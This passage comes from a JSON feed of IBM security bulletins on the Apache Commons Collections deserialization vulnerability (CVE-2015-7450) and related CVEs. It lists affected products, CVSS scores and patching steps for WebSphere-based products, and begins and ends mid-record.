for the IBM Installation Manager, you can install interim fixes from a command prompt by following the syntax and commands described here: <https://www.ibm.com/support/knowledgecenter/SSEQTP_8.0.0/com.ibm.websphere.installation.base.doc/info/aes/ae/tins_install_fixes_dist_cl.html?lang=en> Follow the advice in this link wherever the IBM Installation Manager is mentioned in the rest of these procedures. \n**Detailed Steps to perform the upgrade:** \n \n1) Stop the Liberty server that runs on the Applications server. \n\na) Log on to the Applications server as `root`. \nb) Enter the commands: `**cd /opt/ibm/ioc51install/sample**` \n`**./maint.sh**` c) Under the title `**\"Control an IOC single-server instance\"**`, select `**\"4b) Stop Liberty <**``**_server_**``**>\"**`. \n2) Log on to the Applications server as `**root**` by using the Gnome desktop or the KDE desktop. \n \n3) **_Either_****_ _****_perform the update using a GUI:_**\n\nUpdate the components on the Applications server, including Liberty: a) Start the Installation Manager through the GUI: **Applications -> IBM Applications Installation Manager** b) Select `**'Update'**`. \nc) Select `**'Next'**` repeatedly until you are prompted for an IBM ID and password. \nd) If you are prompted to perform an update to a new version of Installation Manager, click `**'Yes'**` to perform the upgrade and then click `**'OK'**` to restart the Installation Manager when prompted. e) If you upgraded the Installation Manager, select `**\"Update\"**` again. \nf) On the `\"Configuration for IBM WebSphere Application Server Liberty Network Deployment 8.5.5.7\"` panel, select `**\"Launch Asset Selection Wizard\"**`. \ng) Select `**\"Update all packages with recommended updates and recommended fixes\"**` \nh) Enter your IBM ID and password. \ni) Accept the terms of the license agreement, and click `**'Finish'**`. \nj) On the \"Update Packages\" screen, in the Package Group Name column, select \"IBM WebSphere Application Server Network Deployment V8.0\" and click `**'Next'**`. \n**_Do not select \"IBM SPSS Collaboration and Deployment Services 7.0\", and do not select \"Update all packages with recommended updates and recommended fixes\". IOC is incompatible with the upgrade to SPSS._** k) Select all available fixes for \"WebSphere Application Server Network Deployment\". You must apply the Apache Commons fix **8.0.0.0-WS-WAS-IFPI52103**. \n**Note: This fix might not appear initially. You might have to apply earlier fixes to WebSphere Application Server to see this fix.** \nIf necessary, re-run IBM Installation Manager, select `**\"Update Packages for IBM WebSphere Application Server Network Deployment V8.0\"**` and then select `**\"All available fixes for WebSphere Application Server Network Deployment\"**`. \nApply all outstanding WebSphere Application Server updates. \nWhen you have applied all the WebSphere Application Server fixes, proceed to the next step. \n**_Or perform the update using a command line:_**\n\na) Download the `**8.5.5.7-WS-WLP-DistOnly-IFPI52103**``**.zip**` file to a local system. \nb) Upload the compressed file to the `**/tmp**` file system on the Application Server. \nc) Log on to a terminal session as the `root` user. \nd) Execute these two commands to perform the installation: `**cd /opt/IBM/InstallationManager/eclipse/tools**` \n \n`**/imcl install 8.5.5.7-WS-WLP-DistOnly-IFPI52103**` `** -installationDirectory /opt/IBM/WebSphere/wlp -repositories**` \n`** /tmp/8.5.5.7-ws-wlp-distonly-ifpi52103.zip**` \nThese commands install `8.5.5.7-WS-WLP-DistOnly-IFPI52103_8.5.5007.20151114_2058` to the `/opt/IBM/WebSphere/wlp` directory. \ne) To validate the installation perform the command: `**./imcl listInstalledPackages -long**` \n4) Start the Liberty server with the commands: \n\n`**cd /opt/ibm/ioc51install/sample**` \n`**./maint.sh**` 5) Under the title `**\"Control an IOC single-server instance\"**`, \n\nselect `**\"4a) Start Liberty <**``**_server_**``**>\"**`.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-19T21:04:31", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons in\u00a0IBM WebSphere Application Server affects Intelligent Operations Center and related products\u00a0(CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3566", "CVE-2015-7450"], "modified": "2022-08-19T21:04:31", "id": "63DAED287E5E589CB66DEE42D6AD62CBADA57BF5A22C757E4A6252674CC1D266", "href": "https://www.ibm.com/support/pages/node/272121", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T17:52:15", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by Tivoli Storage Productivity Center and IBM Spectrum Control.\n\n## Vulnerability Details\n\n**CVEID:**[](<https://vulners.com/cve/CVE-2015-7450>) [CVE-2015-7450](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/107918> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Spectrum Control 5.2.9 \nTivoli Storage Productivity Center 5.2.0 through 5.2.7 \nTivoli Storage Productivity Center 5.1.0 through 5.1.1.9 \n \nTivoli Storage Productivity Center 4.x and 3.x are not affected. \nIBM Spectrum Control 5.2.8 is not affected. \n \n*** Important:** Although IBM Spectrum Control 5.2.8 is not affected by this vulnerability, if you have applied version 5.2.9, the vulnerability has been re-introduced and must be remediated.\n\n## Remediation/Fixes\n\nThe solution is to apply an appropriate IBM Spectrum Control or Tivoli Storage Productivity Center fix maintenance for each named product and execute the manual steps listed below. \n \nIf you cannot upgrade to a fixed level of IBM Spectrum Control or Tivoli Storage Productivity Center, you can follow a procedure to apply an IBM WebSphere Application Server interim fix to your existing server as a mitigation noted here. \n\n**Note:** It is always recommended to have a current backup before applying any update procedure.\n\n< /br >\n\n \n \n**_IBM Spectrum Control 5.2.x and Tivoli Storage Productivity Center V5.2.x_** \n \n\n\n**Affected Version**\n\n| \n\n**APAR**\n\n| \n\n**Fixed Version**\n\n| \n\n**Availability** \n \n---|---|---|--- \n5.2.0 - 5.2.7| IT14418| 5.2.8** ***| December 2015 \n5.2.9** ***| IT15009| 5.2.10| May 2016 \n*** Important:** This vulnerability is not resolved in IBM Spectrum Control 5.2.9, even if you previously applied IBM Spectrum Control 5.2.8. \n \nApply fix maintenance as soon as practicable. (See [_Latest Downloads_](<http://www.ibm.com/support/docview.wss?uid=swg21320822>)) \n\n\n< /br >\n\n \n \n**_Tivoli Storage Productivity Center V5.1.x_** \n \n\n\n**Affected Version**\n\n| \n\n**APAR**\n\n| \n\n**Fixed Version**\n\n| \n\n**Availability** \n \n---|---|---|--- \n5.1.x| IT14418| 5.1.1.10 \n \nManual update steps are required in addition to applying 5.1.1.10. See steps below this table.| April 2016 \nApply fix maintenance as soon as practicable. (See [_Latest Downloads_](<http://www.ibm.com/support/docview.wss?uid=swg21320822>)) \n \nThese manual steps are required in addition to applying the V5.1.1.10 fixpack. \n \nTivoli Storage Productivity Center 5.1.x embeds Tivoli Integrated Portal 2.2 which embeds Websphere Application Server 7.0 and requires the corresponding fix below. Follow these steps to apply the fix: \n\n\n1\\. Download Websphere iFix PI52103 for WAS 7.0.0.0 (7.0.0.0-WS-WAS-IFPI52103) \n<http://www-01.ibm.com/support/docview.wss?uid=swg24041257> \n \n2\\. Apply the WebSphere Application Server 7.0 ifix PI52103 to Tivoli Integrated Portal using the preinstalled WAS Update Installer \n \n_ On Windows, the default location for WAS Update Installer is:_ \n[TPC_Install_Location]\\IBM\\tipv2\\WebSphereUpdateInstallerV7\\ \n \n**Reference****:** [Security Bulletin: Multiple security vulnerabilities has been identified in Websphere Application Server shipped with Tivoli Integrated Portal (CVE-2015-7450) (CVE-2015-2017)](<http://www.ibm.com/support/docview.wss?uid=swg21971089>)\n\n< /br >\n\n## Workarounds and Mitigations\n\n \nApplying IBM WebSphere Application Server interim fix PI52103 is an alternate option to mitigate the vulnerability if you cannot move up to a fixed level as noted in the table above. For more information, review the Websphere Application Server security bulletin: <http://www-01.ibm.com/support/docview.wss?uid=swg21970575>\n\n**Note:** Prior to applying the WebSphere Application Server interim fix, ensure Tivoli Storage Productivity Center is at the latest maintenance level -- 5.1.1.9, 5.2.7 or 5.2.9. If you later upgrade to a version of Tivoli Storage Productivity Center that does not contain a fix, you will need to perform this mitigation again. (See [_Latest Downloads_](<http://www.ibm.com/support/docview.wss?uid=swg21320822>)) \n\n**Note:** It is always recommended to have a current backup before applying any update procedure.\n\n**Procedure for mitigation of IBM Spectrum Control 5.2.9 and Tivoli Storage Productivity Center 5.2.x and 5.1.1.x:**\n\n1\\. Download Websphere iFix PI52103 for Websphere Application Server 8.0.0.0 (8.0.0.0-WS-WAS-IFPI52103) from this location: [http://www.ibm.com/support/docview.wss?uid=swg24041257](<http://www-01.ibm.com/support/docview.wss?uid=swg24041257>)\n\n2\\. If IBM Installation Manager is not yet installed on the IBM Spectrum Control or Tivoli Storage Productivity server system, download and install IBM Installation Manager. It is recommended to use the latest version -- currently 1.8.3, available here: [_http://www.ibm.com/support/docview.wss?uid=swg24039631_](<http://www-01.ibm.com/support/docview.wss?uid=swg24039631>)\n\n3\\. Launch IBM Installation Manager from the command line, specifying the IMData directory. The following is an example for Windows: \n\n\n \nIBMIM.exe -dataLocation <TPC_dir>\\IMData \n\nwhere TPC_dir might be \\Program Files\\IBM\\TPC\n\n \n4\\. From the IBM Installation Manager UI: \n\n \na. Select 'File' -> 'Preferences' \n\nb. Click on 'Add repository'\n\nc. Select the directory containing the WAS iFix. Press 'OK'\n\nd. Choose the 'Update' icon\n\ne. Select WAS iFix PI52103 and press 'Next'\n\nf. Verify the pre-installation summary is correct and select 'Update'\n\n \n \n**Additional procedure for mitigation of Tivoli Integrated Portal used by Tivoli Storage Productivity Center 5.1.1.x only:** \n \nTivoli Storage Productivity Center 5.1.x embeds Tivoli Integrated Portal 2.2 which embeds Websphere Application Server 7.0 and requires the corresponding fix below. Follow these steps to apply the fix: \n \n1\\. Download Websphere iFix PI52103 for WAS 7.0.0.0 (7.0.0.0-WS-WAS-IFPI52103) \n[http://www.ibm.com/support/docview.wss?uid=swg24041257](<http://www-01.ibm.com/support/docview.wss?uid=swg24041257>) \n \n2\\. Apply the WebSphere Application Server 7.0 ifix PI52103 to Tivoli Integrated Portal using the preinstalled WAS Update Installer \n \n_ On Windows, the default location for WAS Update Installer is:_ \n[TPC_Install_Location]\\IBM\\tipv2\\WebSphereUpdateInstallerV7\\ \n \n**Reference:** [Security Bulletin: Multiple security vulnerabilities has been identified in Websphere Application Server shipped with Tivoli Integrated Portal (CVE-2015-7450) (CVE-2015-2017)](<http://www-01.ibm.com/support/docview.wss?uid=swg21971089>)\n\n< /br >\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-22T19:27:34", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects Tivoli Storage Productivity Center and IBM Spectrum Control (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2017", "CVE-2015-7450"], "modified": "2022-02-22T19:27:34", "id": "1696E1D8792540E46785AF5C86F8AD0F77D5F716A56F15223E99344280FB380A", "href": "https://www.ibm.com/support/pages/node/273075", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-24T01:36:58", "description": "## Summary\n\nThere are multiple vulnerabilities in IBM WebSphere Application Server bundled with IBM Jazz Team Server based Applications that affect the following products: Collaborative Lifecycle Management (CLM), Rational DOORS Next Generation (RDNG), Rational Engineering Lifecycle Manager (RELM), Rational Team Concert (RTC), Rational Quality Manager (RQM), Rational Rhapsody Design Manager (Rhapsody DM) and IBM Rhapsody Model Manager.\n\n## Vulnerability Details\n\n**CVEID: **[CVE-2015-7450](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Serialized-object interfaces in certain IBM analytics, business solutions, cognitive, IT infrastructure, and mobile and social products allow remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the InvokerTransformer class in the Apache Commons Collections library. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/107918> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n**CVEID:** [CVE-2014-3603](<https://vulners.com/cve/CVE-2014-3603>) \n**DESCRIPTION:** The (1) HttpResource and (2) FileBackedHttpResource implementations in Shibboleth Identity Provider (IdP) before 2.4.1 and OpenSAML Java 2.6.2 do not verify that the server hostname matches a domain name in the subject's Common Name (CN) or subjectAltName field of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via an arbitrary valid certificate. \nCVSS Base Score: 6.5 \nCVSS Temporal Score: See [](<https://exchange.xforce.ibmcloud.com/vulnerabilities/160203>)<https://exchange.xforce.ibmcloud.com/vulnerabilities/164271>[](<https://exchange.xforce.ibmcloud.com/vulnerabilities/160203>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N)\n\n**CVEID:** [CVE-2019-12402](<https://vulners.com/cve/CVE-2019-12402>) \n**DESCRIPTION:** The file name encoding algorithm used internally in Apache Commons Compress 1.15 to 1.18 can get into an infinite loop when faced with specially crafted inputs. This can lead to a denial of service attack if an attacker can choose the file names inside of an archive created by Compress. \nCVSS Base Score: 5.3 \nCVSS Temporal Score: See [](<https://exchange.xforce.ibmcloud.com/vulnerabilities/160203>)<https://exchange.xforce.ibmcloud.com/vulnerabilities/165956>[](<https://exchange.xforce.ibmcloud.com/vulnerabilities/160203>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)\n\n## Affected Products and Versions\n\nRational Collaborative Lifecycle Management 6.0 - 6.0.6.1 \n \nRational Quality Manager 6.0 - 6.0.6.1 \nRational Team Concert 6.0 - 6.0.6.1 \nRational DOORS Next Generation 6.0 - 6.0.6.1 \nRational Engineering Lifecycle Manager 6.0 - 6.0.6.1 \nRational Rhapsody Design Manager 6.0 - 6.0.6.1\n\nIBM Rhapsody Model Manager 6.0.5 - 6.0.6.1\n\n## Remediation/Fixes\n\nThe IBM Jazz Team Server based Applications bundle different versions of IBM WebSphere Application Server with the available versions of the products, and in addition to the bundled version some previous versions of WAS are also supported. Information about multiple security vulnerabilities affecting WAS has been published.\n\nFor CLM applications version 6.0 to 6.0.6.1 review the Security Bulletins below to determine if your WAS version is affected and the required remediation:\n\n[Security Bulletin: Apache Commons Collections library in WebSphere Application Server Knowledge Center is vulnerable (CVE-2015-7450)](<https://www.ibm.com/support/pages/node/1107105>)\n\n[Security Bulletin: Man in the middle vulnerability in WebSphere Application Server Liberty (CVE-2014-3603)](<https://www.ibm.com/support/pages/security-bulletin-man-middle-vulnerability-websphere-application-server-liberty-cve-2014-3603>)\n\n[Security Bulletin: Denial of service vulnerability in WebSphere Application Server Liberty (CVE-2019-12402)](<https://www.ibm.com/support/pages/node/1074156>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-08-04T16:06:07", "type": "ibm", "title": "Security Bulletin: Security vulnerabilities affect multiple IBM Rational products based on IBM Jazz technology", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-3603", "CVE-2015-7450", "CVE-2019-12402"], "modified": "2020-08-04T16:06:07", "id": "C08849A00434A559EE1C5504DAE1CDDB28E9D46EDC400E95B2136AC317DFE7A3", "href": "https://www.ibm.com/support/pages/node/1110393", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:40", "description": "## Summary\n\nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Business Process Manager.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2015-7450_](<https://vulners.com/cve/CVE-2015-7450>) \n**DESCRIPTION:** Apache Commons Collections could allow a remote attacker to execute arbitrary code on the system, caused by the deserialization of data with Java InvokerTransformer class. By sending specially crafted data, an attacker could exploit this vulnerability to execute arbitrary Java code on the system. \nCVSS Base Score: 9.8 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107918_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107918>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nIBM Business Process Manager V8.5.0.0 - V8.5.6.0\n\n## Remediation/Fixes\n\nInstall IBM Business Process Manager interim fix JR54748 as appropriate for your current IBM Business Process Manager version. \n\n\n * [_IBM Business Process Manager Advanced_](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM+Business+Process+Manager+Advanced&release=All&platform=All&function=aparId&apars=JR54748>)\n * [IBM Business Process Manager Standard](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM+Business+Process+Manager+Standard&release=All&platform=All&function=aparId&apars=JR54748>)\n * [IBM Business Process Manager Express](<http://www.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~WebSphere&product=ibm/WebSphere/IBM+Business+Process+Manager+Express&release=All&platform=All&function=aparId&apars=JR54748>)\n * Note that the vulnerable open source library was also included in IBM WebSphere Application Server (WAS) that is shipped with IBM Business Process Manager (all versions and editions). Refer to the following Security bulletin for details about required WAS updates in your BPM environment: [Security Bulletin: Security vulnerabilities have been identified in IBM WebSphere Application Server shipped with IBM Business Process Manager and WebSphere Lombardi Edition (CVE-2015-7450, CVE-2015-2017, CVE-2015-4872, CVE-2015-4734, CVE-2015-5006)](<http://www.ibm.com/support/docview.wss?uid=swg21970332>)\n\n## Workarounds and Mitigations\n\nnone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:04:21", "type": "ibm", "title": "Security Bulletin: Vulnerability in Apache Commons affects IBM Business Process Manager (CVE-2015-7450)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2017", "CVE-2015-4734", "CVE-2015-4872", "CVE-2015-5006", "CVE-2015-7450"], "modified": "2018-06-15T07:04:21", "id": "2CB6FCE1D8C2AE7870229728405D7DB0319A218C7C0F82CAE5330252E65018ED", "href": "https://www.ibm.com/support/pages/node/273367", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:54:41", "description": "## Summary\n\nWebSphere Application Server is shipped as a component of IBM Business Process Manager and WebSphere Lombardi Edition. Information about security vulnerabilities affecting WebSphere Application Server has been published in security bulletins.\n\n## Vulnerability Details\n\nPlease consult the security bulletins \n\n * [Security Bulletin: HTTP response splitting attack in WebSphere Application Server (CVE-2015-2017)](<http://www.ibm.com/support/docview.wss?uid=swg21966837>)\n * [Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server October 2015 CPU (CVE-2015-4872, CVE-2015-4734, CVE-2015-5006)](<http://www.ibm.com/support/docview.wss?uid=swg21969620>)\n * [Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)](<http://www.ibm.com/support/docview.wss?uid=swg21970575>)\nfor vulnerability details and information about fixes. \n\n## Affected Products and Versions\n\n * * IBM Business Process Manager V7.5.x through V8.5.6.0\n * WebSphere Lombardi Edition V7.2.0.x\n \n \n_For__ earlier unsupported versions of the products, IBM recommends upgrading to a fixed, supported version of the product._\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-06-15T07:03:52", "type": "ibm", "title": "Security Bulletin: Security vulnerabilities have been identified in IBM WebSphere Application Server shipped with IBM Business Process Manager and WebSphere Lombardi Edition (CVE-2015-7450, CVE-2015-2017, CVE-2015-4872, CVE-2015-4734, CVE-2015-5006)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2017", "CVE-2015-4734", "CVE-2015-4872", "CVE-2015-5006", "CVE-2015-7450"], "modified": "2018-06-15T07:03:52", "id": "85C7B2A7E45DEAC491FFA9036DDD7B660F687C1176A08D3E4CE2EE121DB8C2FA", "href": "https://www.ibm.com/support/pages/node/270855", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-28T17:47:40", "description": "## Summary\n\nWebSphere Application Server is shipped as a component of WebSphere Process Server. Information about security vulnerabilities affecting WebSphere Application Server has been published in security bulletins.\n\n## Vulnerability Details\n\nPlease consult the security bulletins \n\n * [Security Bulletin: HTTP response splitting attack in WebSphere Application Server (CVE-2015-2017)](<http://www.ibm.com/support/docview.wss?uid=swg21966837>)\n * [Security Bulletin: Multiple vulnerabilities in IBM\u00ae Java SDK affect WebSphere Application Server October 2015 CPU (CVE-2015-4872, CVE-2015-4734, CVE-2015-5006)](<http://www.ibm.com/support/docview.wss?uid=swg21969620>)\n * [Security Bulletin: Vulnerability in Apache Commons affects IBM WebSphere Application Server (CVE-2015-7450)](<http://www.ibm.com/support/docview.wss?uid=swg21970575>)\n \nfor vulnerability details and information about fixes.\n\n## Affected Products and Versions\n\n * WebSphere Process Server 7.0.x\n * WebSphere Process Server Hypervisor Editions V7.0\n\n \nGeneral support for WebSphere Process Server ended 2015-04-30. Hypervisor editions were in support until 2015-09-30. You are strongly advised to upgrade to a supported product such as IBM Business Process Manager Advanced Edition.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-15T18:47:15", "type": "ibm", "title": "Security Bulletin: Security vulnerabilities have been identified in IBM WebSphere Application Server shipped with WebSphere Process Server (CVE-2015-7450, CVE-2015-2017, CVE-2015-4872, CVE-2015-4734, CVE-2015-5006)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-2017", "CVE-2015-4734", "CVE-2015-4872", "CVE-2015-5006", "CVE-2015-7450"], "modified": "2022-09-15T18:47:15", "id": "2AA98F262EB695D2458A3ED4EC4F0E7090EB4CE4B2F0F815EF828CF974F2C44B", "href": "https://www.ibm.com/support/pages/node/270853", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T01:46:52", "description": "## Summary\n\nFixes of Cognos Business Intelligence is provided as part of Tivoli Common Reporting (TCR) fixes. \n \nThere are multiple vulnerabilities in IBM\u00ae Runtime Environment Java\u2122 Technology Edition, Version 6 and IBM\u00ae Runtime Environment Java\u2122 Technology Edition, Version 7 that are used by IBM Cognos Business Intelligence. These issues were disclosed as part of the IBM Java SDK updates in October 2015. \n \nAn Apache Commons Collections vulnerability for handling Java object deserialization was addressed by IBM Cognos Business Intelligence. \n \nAdd/remove users to/from an external (namespace) group could leave them with old permissions. \n \nBackURL prefixed with white-space skips CAF validation. \n \nA security vulnerability has been discovered in the Open Source Apache HttpComponents. \n\n## Vulnerability Details\n\n**CVEID: **[_CVE-2015-7436_](<https://vulners.com/cve/CVE-2015-7436>)** \nDESCRIPTION:** Add/remove users to/from an external (namespace) group could leave them with old permissions. \nCVSS Base Score: 2.5 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107961_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107961>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N) \n\n**CVEID: **[_CVE-2015-7435_](<https://vulners.com/cve/CVE-2015-7435>)** \nDESCRIPTION:** BackURL prefixed with white-space skips CAF validation. \nCVSS Base Score: 3.7 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/107960_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/107960>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N) \n** \nCVEID: **[_CVE-2012-6153_](<https://vulners.com/cve/CVE-2012-6153>)** \nDESCRIPTION:** Apache HttpComponents could allow a remote attacker to conduct spoofing attacks, caused by an incomplete fix related to the failure to verify that the server hostname matches a domain name in the Subject's Common Name (CN) or SubjectAltName field of certificates. By persuading a victim to visit a Web site containing a specially-crafted certificate, an attacker could 